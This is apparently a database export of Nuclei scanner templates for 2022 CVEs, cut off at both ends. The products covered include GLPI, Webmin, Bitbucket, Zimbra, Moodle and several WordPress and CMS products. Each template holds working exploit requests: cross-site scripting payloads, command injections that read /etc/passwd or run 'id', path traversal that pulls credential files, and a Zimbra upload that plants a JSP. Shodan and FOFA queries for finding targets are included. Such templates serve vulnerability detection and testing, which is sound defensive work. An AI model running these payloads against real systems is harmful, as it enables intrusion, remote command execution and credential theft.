cpe:2.3:a:wrteam:eshop_-_ecommerce_\\/_store_website:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wrteam\n product: eshop_-_ecommerce_\\/_store_website\n shodan-query: http.html:\"eShop - Multipurpose Ecommerce\"\n tags: cve,cve2022,eshop,xss,wrteam\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'Search Result for \\\">'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202a6133499f5d377e9c10cce1deaaa1b80217ec22156f69d6175a9b958321a8d502210085ca957af87670643c6aed09bf0156a4c37519c0b98b77050dcbca0b85e8b814:922c64590222798bb761d5b6d8e72950", "hash": "ee3ecd6c8184c0864751d2147ed919df", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308563" }, "name": "CVE-2022-35653.yaml", "content": "id: CVE-2022-35653\n\ninfo:\n name: Moodle LTI module Reflected - Cross-Site Scripting\n author: iamnoooob,pdresearch\n severity: medium\n description: |\n A reflected XSS issue was identified in the LTI module of Moodle. The vulnerability exists due to insufficient sanitization of user-supplied data in the LTI module. 
A remote attacker can trick the victim into following a specially crafted link and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website to steal potentially sensitive information, change the appearance of the web page, or perform phishing and drive-by-download attacks.\n reference:\n - http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-72299\n - https://nvd.nist.gov/vuln/detail/CVE-2022-35653\n - https://bugzilla.redhat.com/show_bug.cgi?id=2106277\n - https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6MOKYVRNFNAODP2XSMGJ5CRDUZCZKAR3/\n - https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MTKUSFPSYFINSQFSOHDQIDVE6FWBEU6V/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-35653\n cwe-id: CWE-79\n epss-score: 0.00921\n epss-percentile: 0.82544\n cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: moodle\n product: moodle\n shodan-query: title:\"Moodle\"\n tags: cve,cve2022,moodle,xss\n\nhttp:\n - raw:\n - |\n POST /mod/lti/auth.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n xxx\">=1\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"moodle-editor\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022004b941fe0c29e3e5d82693bdb719e8d8bf0d20abade4a23f07f9a6f83c96c49e02201aeae2d265a2fa845153049b513dbfcbef5d317b1d289064871fdd40cc17f5c2:922c64590222798bb761d5b6d8e72950", "hash": "5866efb6e4d8b238bb9c697d9223a65a", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308564" }, "name": "CVE-2022-3578.yaml", "content": "id: CVE-2022-3578\n\ninfo:\n name: WordPress ProfileGrid <5.1.1 - Cross-Site Scripting\n author: theamanrawat\n 
severity: medium\n description: |\n WordPress ProfileGrid plugin prior to 5.1.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update WordPress ProfileGrid to version 5.1.1 or later to mitigate the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/17596b0e-ff45-4d0c-8e57-a31101e30345\n - https://wordpress.org/plugins/profilegrid-user-profiles-groups-and-communities/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3578\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-3578\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45981\n cpe: cpe:2.3:a:metagauss:profilegrid:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: metagauss\n product: profilegrid\n framework: wordpress\n tags: cve,cve2022,wp-plugin,wordpress,wpscan,wp,xss,profilegrid,authenticated,metagauss\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=pm_add_group&id=\">&tab\")'\n condition: and\n# digest: 4b0a00483046022100dd995de30ddd471912eccf3b1c9747f357455709c02fff57a2ae72242063cfb6022100cf266425327b75e1aa894d7acfd50ae332dcda54311cd37251e9aecaed629c17:922c64590222798bb761d5b6d8e72950", "hash": "0aae97e750bf43d4374c21ed5648e885", "level": 
4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308565" }, "name": "CVE-2022-35914.yaml", "content": "id: CVE-2022-35914\n\ninfo:\n name: GLPI <=10.0.2 - Remote Command Execution\n author: For3stCo1d\n severity: critical\n description: |\n GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system.\n remediation: |\n Upgrade GLPI to a version higher than 10.0.2 to mitigate this vulnerability.\n reference:\n - https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914\n - https://github.com/cosad3s/CVE-2022-35914-poc\n - http://www.bioinformatics.org/phplabware/sourceer/sourceer.php?&Sfs=htmLawedTest.php&Sl=.%2Finternal_utilities%2FhtmLawed\n - https://nvd.nist.gov/vuln/detail/CVE-2022-35914\n - https://github.com/glpi-project/glpi/releases\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-35914\n cwe-id: CWE-74\n epss-score: 0.97399\n epss-percentile: 0.99914\n cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: glpi-project\n product: glpi\n shodan-query: http.favicon.hash:\"-1474875778\"\n tags: cve,cve2022,glpi,rce,kev,glpi-project\nvariables:\n cmd: \"cat+/etc/passwd\"\n\nhttp:\n - raw:\n - |\n POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: sid=foo\n\n sid=foo&hhook=exec&text={{cmd}}\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 
4b0a00483046022100e6859ca0826caafa4dc545ef1248adebca25f472c0e3188fb46cd23a4dd3bfc0022100ae9f408351c828c91bf99522202d215eabc284c86bcc9abb16c786e316ac0ebc:922c64590222798bb761d5b6d8e72950", "hash": "7c58041ab9981bc5897b3ed09ae6c817", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308566" }, "name": "CVE-2022-36446.yaml", "content": "id: CVE-2022-36446\n\ninfo:\n name: Webmin <1.997 - Authenticated Remote Code Execution\n author: gy741\n severity: critical\n description: |\n Webmin before 1.997 is susceptible to authenticated remote code execution via software/apt-lib.pl, which lacks HTML escaping for a UI command. An attacker can perform command injection attacks and thereby execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary code on the target system.\n remediation: |\n Upgrade Webmin to version 1.997 or later to mitigate this vulnerability.\n reference:\n - https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165\n - https://www.exploit-db.com/exploits/50998\n - https://github.com/webmin/webmin/compare/1.996...1.997\n - https://nvd.nist.gov/vuln/detail/CVE-2022-36446\n - http://packetstormsecurity.com/files/167894/Webmin-1.996-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-36446\n cwe-id: CWE-116\n epss-score: 0.97131\n epss-percentile: 0.99752\n cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: webmin\n product: webmin\n shodan-query: title:\"Webmin\"\n tags: cve,cve2022,packetstorm,webmin,rce,authenticated,edb\n\nhttp:\n - raw:\n - |\n POST /session_login.cgi HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 
user={{username}}&pass={{password}}\n - |\n POST /package-updates/update.cgi HTTP/1.1\n Host: {{Hostname}}\n Referer: {{BaseURL}}/package-updates/update.cgi?xnavigation=1\n\n mode=new&search=ssh&redir=&redirdesc=&u=0%3Becho+%27{{randstr}}%27%27{{randstr}}%27%3B+id%3B+echo+%27{{randstr}}%27%27{{randstr}}%27&confirm=Install%2BNow\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{randstr}}'\n - 'uid'\n - 'gid'\n - 'groups'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c00ba6d3cd5e3419f477ba4f1c6636a9a6527a59b9c3b11b6947953d18b99fff022100b6882779caab224e10ac09ce3d14a50090914c62c5248a1f2cc556ba1c3cb21f:922c64590222798bb761d5b6d8e72950", "hash": "205da3c9836d654b424de22429556669", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308567" }, "name": "CVE-2022-36537.yaml", "content": "id: CVE-2022-36537\n\ninfo:\n name: ZK Framework - Information Disclosure\n author: theamanrawat\n severity: high\n description: |\n ZK Framework 9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 is susceptible to information disclosure. 
An attacker can access sensitive information via a crafted POST request to the component AuUploader and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n The vulnerability can lead to the exposure of sensitive data, such as credentials or internal system information.\n remediation: |\n Apply the latest security patches or updates provided by the ZK Framework to fix the information disclosure vulnerability.\n reference:\n - https://github.com/Malwareman007/CVE-2022-36537/\n - https://tracker.zkoss.org/browse/ZK-5150\n - https://nvd.nist.gov/vuln/detail/CVE-2022-36537\n - https://www.bleepingcomputer.com/news/security/cisa-warns-of-hackers-exploiting-zk-java-framework-rce-flaw/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-36537\n cwe-id: CWE-200\n epss-score: 0.95859\n epss-percentile: 0.99401\n cpe: cpe:2.3:a:zkoss:zk_framework:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: zkoss\n product: zk_framework\n shodan-query: http.title:\"Server backup manager\"\n tags: cve,cve2022,zk-framework,exposure,unauth,kev,intrusive,zkoss\n\nhttp:\n - raw:\n - |\n GET /login.zul HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip, deflate\n Accept: */*\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp\n Content-Length: 154\n\n ------WebKitFormBoundaryCs6yB0zvpfSBbYEp\n Content-Disposition: form-data; name=\"nextURI\"\n\n /WEB-INF/web.xml\n ------WebKitFormBoundaryCs6yB0zvpfSBbYEp--\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - .*\n - |-\n ((.|\n )*)welcome-file-list>\n - xml version\n - web-app\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: dtid\n 
group: 1\n regex:\n - \"dt:'(.*?)',cu:\"\n internal: true\n# digest: 4a0a0047304502202cfa133f395dd683e1024de424de18fd3f12ff8a827f399357055226d7b8644c022100b0f39d19405888c00c5f79a616f6d8b3424a5f58b8ddfc5d37ad214eecdb917b:922c64590222798bb761d5b6d8e72950", "hash": "7ae6c039219bd59a7a3a6071a91ef571", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308568" }, "name": "CVE-2022-36553.yaml", "content": "id: CVE-2022-36553\n\ninfo:\n name: Hytec Inter HWL-2511-SS - Remote Command Execution\n author: HuTa0\n severity: critical\n description: |\n Hytec Inter HWL-2511-SS v1.05 and below was discovered to contain a command injection vulnerability via the component /www/cgi-bin/popen.cgi.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2022-36553\n - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/cellular-router-rce.yaml\n - https://gist.github.com/Nwqda/b27418ab801eb0b9cdbe8d042cb0249b\n - https://hytec.co.jp/eng/products/our-brand/hwl-2511-ss.html\n - https://hytec.co.jp/eng/wordpress/wp-content/uploads/2019/09/hwl-2511-ss-ds.3.0.pdf\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-36553\n cwe-id: CWE-77\n epss-score: 0.46383\n epss-percentile: 0.9713\n cpe: cpe:2.3:o:hytec:hwl-2511-ss_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: hytec\n product: hwl-2511-ss_firmware\n fofa-query: title=\"index\" && header=\"lighttpd/1.4.30\"\n zoomeye-query: app:\"Hytec Inter HWL-2511-SS\"\n tags: cve2022,cve,hytec,rce\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /cgi-bin/popen.cgi?command={{command}}&v=0.1303033443137912 HTTP/1.1\n Host: {{Hostname}}\n\n payloads:\n command:\n - \"cat%20/etc/passwd\"\n - \"type%20C://Windows/win.ini\"\n stop-at-first-match: true\n\n matchers-condition: or\n matchers:\n - type: dsl\n dsl:\n - \"regex('root:.*:0:0:', body)\"\n - \"contains(body_1, 'index')\"\n 
- \"status_code == 200\"\n condition: and\n\n - type: dsl\n dsl:\n - \"contains(body, 'bit app support')\"\n - \"contains(body, 'fonts')\"\n - \"contains(body, 'extensions')\"\n - \"status_code == 200\"\n - \"contains(body_1, 'index')\"\n condition: and\n# digest: 4a0a00473045022100eddd73199d20d259afa36f518385d2c6a5599db2a684123eb18b7465e35fadc702206d28ba1a993f628e7c45c6a2d82068bfb3c9c72e11e0ca8201a4ef233da38969:922c64590222798bb761d5b6d8e72950", "hash": "67f006a189deb0b6b165248129b42c53", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308569" }, "name": "CVE-2022-36642.yaml", "content": "id: CVE-2022-36642\n\ninfo:\n name: Omnia MPX 1.5.0+r1 - Local File Inclusion\n author: arafatansari,ritikchaddha,For3stCo1d\n severity: critical\n description: |\n Telos Alliance Omnia MPX Node through 1.5.0+r1 is vulnerable to local file inclusion via logs/downloadMainLog. Retrieving userDB.json allows an attacker to obtain cleartext credentials and escalate privileges via the control panel.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of Omnia MPX.\n reference:\n - https://www.exploit-db.com/exploits/50996\n - https://cyber-guy.gitbook.io/cyber-guy/pocs/omnia-node-mpx-auth-bypass-via-lfd\n - https://nvd.nist.gov/vuln/detail/CVE-2022-36642\n - https://www.telosalliance.com/radio-processing/audio-interfaces/omnia-mpx-node\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-36642\n cwe-id: CWE-862\n epss-score: 0.68515\n epss-percentile: 0.97692\n cpe: cpe:2.3:o:telosalliance:omnia_mpx_node_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: telosalliance\n product: omnia_mpx_node_firmware\n shodan-query: http.title:\"Omnia MPX 
Node | Login\"\n tags: cve,cve2022,traversal,omnia,edb,lfi,telosalliance\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd\"\n - \"{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json\"\n\n stop-at-first-match: true\n\n matchers-condition: or\n matchers:\n - type: word\n part: body\n words:\n - '\"username\":'\n - '\"password\":'\n - '\"mustChangePwd\":'\n - '\"roleUser\":'\n condition: and\n\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n# digest: 4a0a0047304502204c76827983086116cc5105ff1864cbc06f821b5e018567ec977226dbf0a96123022100a99892b0c629088eeb4bd82f6815df89a5d0460b742da6fd5e24924e1a44cca0:922c64590222798bb761d5b6d8e72950", "hash": "6cec7b71e772f8bd2673802d65713f10", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30856a" }, "name": "CVE-2022-36804.yaml", "content": "id: CVE-2022-36804\n\ninfo:\n name: Atlassian Bitbucket - Remote Command Injection\n author: DhiyaneshDk,tess,sullo\n severity: high\n description: |\n Atlassian Bitbucket Server and Data Center is susceptible to remote command injection. Multiple API endpoints can allow an attacker with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request, thus making it possible to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. 
Affected versions are 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.\n remediation: |\n Apply the latest security patches provided by Atlassian to mitigate the vulnerability.\n reference:\n - https://github.com/notdls/CVE-2022-36804\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804\n - https://jira.atlassian.com/browse/BSERV-13438\n - https://nvd.nist.gov/vuln/detail/CVE-2022-36804\n - http://packetstormsecurity.com/files/171453/Bitbucket-7.0.0-Remote-Command-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-36804\n cwe-id: CWE-77\n epss-score: 0.97343\n epss-percentile: 0.99886\n cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: atlassian\n product: bitbucket\n shodan-query: http.component:\"BitBucket\"\n tags: cve,cve2022,packetstorm,bitbucket,atlassian,kev\nvariables:\n data: '{{rand_base(5)}}'\n\nhttp:\n - raw:\n - |\n GET /rest/api/latest/repos HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&at={{data}}&path={{data}}&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1\n Host: {{Hostname}}\n\n stop-at-first-match: true\n iterate-all: true\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"com.atlassian.bitbucket.scm.CommandFailedException\"\n\n - type: status\n status:\n - 500\n\n extractors:\n - type: json # type of the extractor\n name: key\n internal: true\n json:\n - '.[\"values\"] | .[] | .[\"project\"] | .key'\n part: body\n\n - type: json\n name: 
slug\n internal: true\n json:\n - '.[\"values\"] | .[] | .slug'\n part: body\n\n - type: regex\n group: 1\n regex:\n - 'uid=.*\\(([a-z]+)\\):'\n# digest: 4a0a0047304502207f05b6fa75f5b18f40fc9cc67c652ba6c7601a227fe47e0bb3a03972933cabf30221009e3c19b251fb9154d5ade0ac96346cf96e5f9d320a6b1322a5a54fb104555e6d:922c64590222798bb761d5b6d8e72950", "hash": "1679bf0af1ccbe01c82f6a82e8102b2c", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30856b" }, "name": "CVE-2022-36883.yaml", "content": "id: CVE-2022-36883\n\ninfo:\n name: Jenkins Git <=4.11.3 - Missing Authorization\n author: c-sh0\n severity: high\n description: Jenkins Git plugin through 4.11.3 contains a missing authorization check. An attacker can trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. This can make it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n This vulnerability can lead to unauthorized access to sensitive data and unauthorized actions being performed on the Jenkins Git plugin.\n remediation: |\n Upgrade to a fixed version of the Jenkins Git plugin (>=4.11.4) or apply the provided patch to mitigate the vulnerability.\n reference:\n - https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-36883\n - https://nvd.nist.gov/vuln/detail/CVE-2022-36883\n - http://www.openwall.com/lists/oss-security/2022/07/27/1\n - https://github.com/StarCrossPortal/scalpel\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-36883\n cwe-id: CWE-862\n epss-score: 0.01328\n epss-percentile: 0.84605\n cpe: cpe:2.3:a:jenkins:git:*:*:*:*:*:jenkins:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: jenkins\n product: git\n framework: jenkins\n shodan-query: X-Jenkins\n tags: 
cve,cve2022,jenkins,plugin,git,intrusive\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"repository:\"\n - SCM API plugin\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ac3853e5c0b1575adbb7b7ed2af7b72f43f114875211dd347e0293df556a12a602201f6215244b284d054336a4750c2340219ab9d9be367383ba0b171439c19ccd56:922c64590222798bb761d5b6d8e72950", "hash": "72991814df7a5e1f9675419a7df65bd9", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30856c" }, "name": "CVE-2022-37042.yaml", "content": "id: CVE-2022-37042\n\ninfo:\n name: Zimbra Collaboration Suite 8.8.15/9.0 - Remote Code Execution\n author: _0xf4n9x_,For3stCo1d\n severity: critical\n description: |\n Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. 
NOTE: this issue exists because of an incomplete fix for CVE-2022-27925.\n remediation: |\n Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite.\n reference:\n - https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/\n - https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/\n - https://github.com/vnhacker1337/CVE-2022-27925-PoC\n - https://nvd.nist.gov/vuln/detail/CVE-2022-37042\n - https://wiki.zimbra.com/wiki/Security_Center\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-37042\n cwe-id: CWE-22\n epss-score: 0.97539\n epss-percentile: 0.99994\n cpe: cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:*\n metadata:\n max-request: 4\n vendor: zimbra\n product: collaboration\n shodan-query: http.favicon.hash:\"1624375939\"\n fofa-query: app=\"zimbra-邮件系统\"\n tags: cve,cve2022,zimbra,rce,unauth,kev\n\nhttp:\n - raw:\n - |\n POST {{path}} HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip, deflate\n content-type: application/x-www-form-urlencoded\n\n {{hex_decode(\"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\")}}\n - |\n GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1\n Host: {{Hostname}}\n\n payloads:\n path:\n - /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1\n - /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd\n\n stop-at-first-match: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_1 == 401'\n - 'status_code_2 == 200'\n - \"contains(body_2,'NcbWd0XGajaWS4DmOvZaCkxL1aPEXOZu')\"\n condition: and\n# digest: 490a004630440220174e125afd24ffd46b83dc8fbd16ba76bac1f9c389dcf41df028a42b438df438022062eb429750f3554a28c017e74167a82a4023aa672bf4059f0bc3e2e444886d8f:922c64590222798bb761d5b6d8e72950", "hash": "af1873b761ca064e6959ad968d03872b", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": 
{ "$oid": "66477a413521042ccf30856d" }, "name": "CVE-2022-37153.yaml", "content": "id: CVE-2022-37153\n\ninfo:\n name: Artica Proxy 4.30.000000 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n Artica Proxy 4.30.000000 contains a cross-site scripting vulnerability via the password parameter in /fw.login.php.\n remediation: |\n Upgrade to a patched version of Artica Proxy or apply the vendor-supplied patch to mitigate the vulnerability.\n reference:\n - https://github.com/Fjowel/CVE-2022-37153\n - https://nvd.nist.gov/vuln/detail/CVE-2022-37153\n - https://github.com/SYRTI/POC_to_review\n - https://github.com/WhooAmii/POC_to_review\n - https://github.com/k0mi-tg/CVE-POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-37153\n cwe-id: CWE-79\n epss-score: 0.0013\n epss-percentile: 0.47096\n cpe: cpe:2.3:a:articatech:artica_proxy:4.30.000000:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: articatech\n product: artica_proxy\n shodan-query: http.html:\"Artica\"\n tags: cve,cve2022,xss,artica,articatech\n\nhttp:\n - raw:\n - |\n POST /fw.login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n userfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Password\" value=\"admin\">'\n - 'Artica Web'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100df0431683f7ff338969210c72a2895dd79303bff523433299b1dc2074c65ffe102210086ecf0af9d7d5b544b35d85c2af4279bb4f62ed131ac6bf93e84e32089f02d3c:922c64590222798bb761d5b6d8e72950", "hash": "2fa3c745a0f49e9e369081d2162c7127", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30856e" }, "name": 
"CVE-2022-37190.yaml", "content": "id: CVE-2022-37190\n\ninfo:\n name: Cuppa CMS v1.0 - Remote Code Execution\n author: theamanrawat\n severity: high\n description: |\n CuppaCMS 1.0 is vulnerable to Remote Code Execution (RCE). An authenticated user can control both parameters (action and function) from \"/api/index.php\".\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patch or update to a patched version of Cuppa CMS v1.0 to mitigate this vulnerability.\n reference:\n - https://github.com/CuppaCMS/CuppaCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-37190\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-37190\n cwe-id: CWE-732\n epss-score: 0.02018\n epss-percentile: 0.8771\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: cuppacms\n product: cuppacms\n tags: cve2022,cve,rce,cuppa,authenticated,cuppacms\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&password={{password}}&language=en&task=login\n - |\n POST /components/table_manager/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n path=component%2Ftable_manager%2Fview%2Fcu_api_keys\n - |\n POST /api/index.php HTTP/1.1\n Host: {{Hostname}}\n key: {{apikey}}\n Content-Type: application/x-www-form-urlencoded\n\n action=system&function=exec&cmd=cat+/etc/passwd\n\n matchers-condition: and\n matchers:\n - type: word\n part: header_3\n words:\n - \"text/html\"\n\n - type: regex\n regex:\n - \"postgres:.*:1001:\"\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: apikey\n group: 1\n regex:\n - \"(.*?)\"\n internal: true\n# digest: 
